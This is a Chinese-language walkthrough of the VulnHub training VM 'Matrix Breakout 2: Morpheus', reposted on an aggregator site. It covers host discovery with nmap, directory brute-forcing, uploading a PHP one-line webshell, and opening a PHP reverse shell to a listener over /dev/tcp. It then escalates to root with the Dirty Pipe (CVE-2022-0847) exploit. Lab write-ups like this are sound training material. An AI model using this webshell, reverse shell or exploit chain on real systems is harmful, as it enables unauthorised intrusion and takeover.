vulhub靶场-matrix-breakout-2-morpheus

下载&部署

从官网中下载 https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

下载完成后,在vmware中打开,选择刚刚下载的ova文件

vmware打开文件后需要将刚导入的机器重新启动

再检查下网卡是否是和kali在同一张网卡下就可以开始打靶了

通关步骤

信息收集

首先确定目标ip

nmap -sn 192.168.111.1/24
#不扫描端口进行c段主机发现

确定玩目标后就可以开始扫描端口

nmap -p- 192.168.111.131
#扫描目标ip全端口

发现开放的端口服务,可以通过爆破ssh弱口令的形式来直接获取服务器权限,但一般ssh的口令都不太好爆破,访问开放的http服务

对目录进行扫描

python3 dirsearch.py -u http://192.168.111.131/

dirsearch扫描无果,尝试用个大字典,最后用dirbuster和字典进行爆破尝试字典路径 /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt

漏洞利用-上传webshell

访问网页

打开burp抓包提交数据,发现数据包内容如下

尝试写入一句话木马,并且修改文件后缀

<?= eval($_POST[1])?>

上传后访问文件是否存在,用antsword进行连接

看到这里基本上就能获取到服务器的权限了

内网信息收集

通过目录搜索,我们发可以发现根目录下的FLAG1

根据提示,在 cypher-neo.png 中存在flag,但是下载图片后并没有发现什么有用的信息,查看图片的时候需要把图片前面的.去掉才能在文件夹中看到图片

回到shell中可以发现权限并不是root,尝试提权,用到提取搜索脚本 linux-exploit-suggester.sh GitHub - mungurk/linux-exploit-suggester.sh

为了方便我们把下载的sh脚本放到tmp目录下,给他可执行权限来执行

chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

提权

发现CVE-2022-0847-dirty pipe可以优先尝试下,因为该漏洞的时间性和便于利用性,可以很好的帮我进行漏洞利用

从这里下载 https://github.com/r1is/CVE-2022-0847 然后上传到 /tmp 目录下

同样给上执行权限777

这里的话需要注意,提权的话,我们需要有一个bash终端才能在提权后成功获取到root权限的bash,所以我们先用php来获取一个bash

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.111.130/13888 0>&1'");?>

然后在终端中监听13888端口,浏览器中访问 1.php

接着运行 Dirty-Pipe.sh

接着就是翻翻目录,成功找到目标文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/737222.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C++ set 容器

1.6 C set 容器 一般性的 Set 实现而言&#xff0c;是无序的&#xff0c;在 C 中&#xff0c;std::set 是有序的容器&#xff0c;它基于红黑树&#xff08;Red-Black Tree&#xff09;实现&#xff0c;并且会根据元素的键值进行排序。因此&#xff0c;std::set 中的元素总是按…

软件测试工程师职位笔试知识点细节(2)

一、软件测试分为哪几个阶段&#xff0c;生命周期&#xff1f; 软件测试一般分为单元测试、集成测试和系统测试。 需求分析→测试计划→测试设计、软件开发→测试执行→测试评估 二、一条软件缺陷&#xff08;或者叫Bug&#xff09;记录都包含了哪些内容&#xff1f; 一条Bug…

设计模式学习笔记 - 规范与重构 - 5.如何通过封装、抽象、模块化、中间层解耦代码?

前言 《规范与重构 - 1.什么情况下要重构&#xff1f;重构什么&#xff1f;又该如何重构&#xff1f;》讲过&#xff0c;重构可以分为大规模高层重构&#xff08;简称 “大型重构”&#xff09;和小规模低层次重构&#xff08;简称 “小型重构”&#xff09;。大型重构是对系统…

Redis运行原理及基本数据类型

Redis 是一个开源的、基于内存的数据存储系统&#xff0c;它通过键值对的方式存储数据。是单线程的内存数据库&#xff0c;采用事件驱动模型来处理并发请求。它使用非阻塞的 I/O 多路复用机制来实现高性能的并发访问。数据库通常会将数据存储在内存中&#xff0c;这样可以提高数…

系统架构设计基础

本博客地址&#xff1a;https://security.blog.csdn.net/article/details/136542641 一. 软件架构 1、软件架构或称软件体系结构&#xff0c;是指系统的一个或者多个结构&#xff0c;这些结构包括软件的构件&#xff08;可能是程序模块、类或者是中间件&#xff09;、构件的外…

谷粒商城【成神路】-【10】——缓存

目录 &#x1f9c2;1.引入缓存的优势 &#x1f953;2.哪些数据适合放入缓存 &#x1f32d;3.使用redis作为缓存组件 &#x1f37f;4.redis存在的问题 &#x1f9c8;5.添加本地锁 &#x1f95e;6.添加分布式锁 &#x1f95a;7.整合redisson作为分布式锁 &#x1f697…

学习大数据,所必需的java基础(完结篇)

文章目录 注解注解的介绍注解的定义以及属性的定义格式注解的使用注解解析的方法----AnnotatedElement接口&#xff08;扩展&#xff09; 元注解注解之在此注解 注解 注解的介绍 1.jdk1.5版本的新特性 — 一个引用数据类型 和类&#xff0c;接口&#xff0c;枚举是同一个层次…

【教程】使用小米换机来迁移数据

转载请注明出处&#xff1a;小锋学长生活大爆炸[xfxuezhang.cn] 1、在新旧手机上都下载安装小米换机app&#xff1a;小米换机-小米应用商店 2、在新手机上&#xff0c;选择旧手机类型 3、授予权限 4、在旧手机上&#xff0c;授予权限 4、输入锁屏密码 5、选择发现的新手机 6、等…

EMC整改

EMC包括EMI和EMS&#xff0c;其中EMI由辐射干扰RE、传导干扰CE、谐波电流Harmonics、闪烁Flicker组成&#xff0c;EMS由静电抗扰度ESD、电快速瞬态脉冲群EFT、电压跌落DIP、传导抗扰度CS、辐射抗扰度RS、浪涌抗扰度surge、工频磁场抗扰度PMS。新产品生产出来但凡要做认证&#…

鸿蒙Harmony应用开发—ArkTS声明式开发(基础手势:NavDestination)

作为子页面的根容器&#xff0c;用于显示Navigation的内容区。 说明&#xff1a; 该组件从API Version 9开始支持。后续版本如有新增内容&#xff0c;则采用上角标单独标记该内容的起始版本。 该组件从API Version 11开始默认支持安全区避让特性(默认值为&#xff1a;expandSaf…

嘿!AI 编码新玩法上线!

随着 AI 智能浪潮到来&#xff0c;AI 编码助手成为越来越多开发者的必备工具&#xff0c;将开发者从繁重的编码工作中解放出来&#xff0c;极大地提高了编程效率&#xff0c;帮助开发者实现更快、更好的代码编写。 通义灵码正是这样一款基于阿里云通义代码大模型打造的智能编码…

Java学习笔记------拼图游戏

图形化界面GUI GUI&#xff1a;Graphical User Interface&#xff08;图像用户接口&#xff09;&#xff0c;指采用图形化的方式显示操作界面 两套体系&#xff1a;AWT包中和Swing包中 组件 JFrame&#xff1a;最外层的窗体 JMenuBar&#xff1a;最上层菜单 JLaber&#…

【蓝桥杯】节省时间

一、对于string类型变量的连接&#xff0c;可以直接用“”或者“”来进行字符串的直接连接 string a"1"; string b"2"; string c; cab"12"; string操作符两边既可以都是string类型&#xff0c;也可是string与char类型 注意&#xff1a; (1)“”…

rj45网络变压器作用

WE-MIDC网络变压器是Wrth Elektronik公司生产的一种专业级别的网络变压器&#xff0c;也称为Wrth Elektronik网络变压器。它通常用于工业自动化、医疗保健、军事和航空航天等领域的网络通信应用。 WE-MIDC网络变压器具有以下特点&#xff1a; 电气隔离&#xff1a;WE-MIDC网络变…

一次压测经验过程的经验记录

开篇说明 如果在这里获得过启发和思考&#xff0c;希望点赞支持&#xff01;对于内容有不同的看法欢迎来信交流。 技术栈 >> java 邮箱 >> 15673219519163.com 描述 通常对于QPS较高的web应用程序在开发完成后&#xff0c;除了功能测试之外还需要做一轮压力测试…

工厂模式~

1. 简单工厂 它的主要特点是需要在工厂类中做判断&#xff0c;从而创造相应的产品。当增加新的产品时&#xff0c;就需要修改工厂类。在简单工厂模式中&#xff0c;增加新的产品需要修改工厂类&#xff0c;这违反了开闭原则&#xff08;对扩展开放&#xff0c;对修改封闭&#…

计算机网络-H3C 交换机FTP与TFTP

一、FTP与TFTP概述 FTP&#xff0c;全称为File Transfer Protocol&#xff0c;即文件传输协议&#xff0c;是一种用于在Internet上进行文件传输的应用层协议。FTP是基于客户端-服务器架构设计的&#xff0c;并使用TCP作为其传输层协议。TFTP (Trivial File Transfer Protocol) …

java继承,接口,抽象类

目录 目录 1 继承的含义 2 继承的好处 3使类与类之间产生了关系。 看这里继承-------我的理解 代码部分 接口 代码 抽象类 代码 各位友友们大家好呀&#x1f60a;&#xff01; 今天让我们继续回顾java&#xff0c;看看java中的抽象类以及接口继承是什么&#x1f914…

如何精确计算 π ?

如何精确计算 π &#xff1f; 01 原本是要回顾一下第六章内容&#xff0c;也就是“间隔性重复”。但我已经迫不及待&#xff0c;想要知道如何精确计算 π &#xff0c;因此&#xff0c;我们快走一步&#xff0c;来探讨一下 π 的计算。 对于 π 的计算&#xff0c;我从学校时…

Python基础学习(5)流程控制

文章目录 一. 程序三大执行流程二. 分支结构1.单分支结构(if)2.双分支结构(if..else)3.多分支结构(if..elif..else) 二,缩进(tab键)三,循环结构1.while循环2.for循环①遍历字典 五.break&#xff0c;continue和pass语句1.break&#xff0c;continue2.pass Python基础学习(1)基本…